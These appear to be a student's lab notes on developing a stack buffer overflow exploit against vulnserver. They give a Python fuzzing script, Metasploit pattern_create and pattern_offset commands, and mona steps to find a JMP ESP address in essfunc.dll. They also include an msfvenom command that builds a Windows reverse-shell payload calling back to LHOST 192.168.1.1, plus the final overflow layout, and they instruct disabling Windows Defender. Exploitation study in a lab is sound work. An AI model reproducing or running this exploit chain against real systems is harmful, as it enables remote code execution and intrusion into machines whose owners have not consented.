vulnerability development

• spiking

s_readline();
s_string("TRUN ");
s_string_variable("0");

$ generic_send_tcp host port spike_cript 0 0 # stuff crashes
# create a simple python script to send data to get the offset
$ pattern_create.rb -l 2400
$ pattern_offset.rb -l 2400 -q pattern
# test for badcharacters (e.g. github badchars) and send those
#  - right click on stackpointer and "follow on dump"
# mona module to find the right module "!mona modules"
#  - aslr: false, safeseh: fasle, rebase: false
#  - "mona jmp -r ESP 0m "essfunc.dll"", get addresses, e.g., 0x625011af \xaf\x11\x50\x62
$ msfvenom -p windows/shell_reverse_tcp LHOST=xxx LPORT=xxx -f c -a x86 -b "\x00"
 
# b"a"*2003 +b"\xaf\x11\x50\x62" + b"\x90"*32 ] overflow

exploit development part

• victim machine has to be a windows machine

  • get a valid windows 10 license from TU (and setup this then)
  • immunity debugger (try the same with ghidra)
  • vulnserver
  • disable windows defender realtime protection
  • vulnserver, immunity run as admin

• steps

  1. spiking
  2. fuzzing
  3. find the offset (eip)
  4. overwrite the eip
  5. finding bad characters
  6. finding the right module
  7. generate shellcode
  8. root!

• spiking

  • generic_send_tcp HOST PORT spike-script 0 0
  • spike script

  s_readline()(
  s_string("STATS ");
  s_string_variable("0");
  

• fuzzing to get the exact size that is used to crash everything

  • to get the EIP offset

#!/usr/bin/python
 
import sys, socket
from time import sleep
 
buffer = "A" * 100
 
while True:
    try:
        payload = "TRUN /.:/" + buffer
 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.1.35',9999))
        print ("[+] Sending the payload...\n" + str(len(buffer)))
        s.send((payload.encode()))
        s.close()
        sleep(1)
        buffer = buffer + "A"*100
    except:
        print ("The fuzzing crashed at %s bytes" % str(len(buffer)))
        sys.exit()

• find the offset

  • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
  • copy code into script
  • run script again, check value in EIP
  • pattern_offset.rb -l 3000 -q 38GF4337
    • gives offset 2003

• overwrite the EIP

  • shellcode = ‘A’*2003 + ‘B’*4

• finding bad characters

  • https://github.com/cytopia/badchars
  • add badchars badchars = ”…” (remove \x00) shellcode = ‘A’*2003 + ‘B’*4 + badchars
  • go to hexdump
    • esp → right click → follow in dump
    • check if there’s anything out of place (01 02 03 04 05 …)
      • search for anything missing

• finding the right module

  • dll without protections (aslr, etc.)
  • “mona modules” → mona.py file, put it into immunity debugger, pycommands
  • bar down there: !mona modules
    • search for modules without protection (False, False, False, False), e.g. essfunc.dll
    • opcode for jump: locate nasm_shell
      • JMP ESP → FFE4
  • !monat find -s “\xff\xe4” -m essfunc.dll
    • get return addresses, e.g. 625011af
  • edit python script
    • shellcode = ‘A’*2003 + “\xaf\x11\x50\x62”

• generate shell code

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b “\x00”
  • shellcode = ‘A’*2003 + “\xaf\x11\x50\x62” + ‘\x90’*32 + overflow

python3 and mona

• add payload.encode() before sending
• !mona config -set workingfolder c:\mona
• !mona bytearray -cpb “\x00”
• copy bytearray from mona folder, copy that into python script
• !mona compare -f c:\mona\bytearray.bin -a
• !mona jmp -r ESP -m “essfunc.dll” (in log data)
• manually byte encode each string? b”…”, don’t need the encoding